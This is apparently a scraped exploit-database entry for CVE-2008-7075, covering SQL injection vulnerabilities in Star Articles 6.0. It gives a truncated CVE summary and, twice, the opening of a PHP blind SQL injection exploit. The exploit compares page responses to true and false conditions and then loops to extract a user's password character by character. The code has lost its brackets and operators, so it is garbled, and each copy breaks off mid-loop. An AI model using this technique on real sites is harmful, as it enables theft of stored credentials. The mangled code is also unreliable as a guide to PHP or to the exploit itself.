CVE-2008-7075

Multiple SQL injection vulnerabilities in Kalptaru Infotech Ltd. Star Articles 6.0 allow remote attackers to inject arbitrary SQL commands via 1 the subcatid parameter to article.list.php; or the artid parameter to 2 article.print.php, 3 article.comments.php, 4 article.publisher.php, or 5...

star-blindsql.txt

1 $url = $argv1; if $argc 3 $userid = 1; else $userid = $argv2; $r = strlenfilegetcontents$url."+and+1=1"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0"; $t = abs100-$w/$r100; echo "\nPassword: "; for $j = 1; $j = 32; $j++ for $i = 46; $i = 102; $i=$i+2 if $i == 60 $i = 98;...

Star Articles 6.0 - Blind SQL Injection (2)

Star Articles 6.0 - Blind SQL Injection 2 1 $url = $argv1; if $argc 3 $userid = 1; else $userid = $argv2; $r = strlenfilegetcontents$url."+and+1=1"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0"; $t = abs100-$w/$r100; echo "\nPassword: "; for $j = 1; $j = 32; $j++ for $i = 46;...